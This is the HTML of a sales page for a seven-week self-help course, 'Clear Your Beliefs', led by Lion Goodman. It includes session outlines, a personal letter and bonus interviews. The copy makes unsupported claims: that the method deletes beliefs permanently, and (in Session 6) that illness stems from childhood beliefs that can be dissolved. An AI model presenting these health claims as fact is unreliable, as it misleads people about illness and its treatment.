experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div 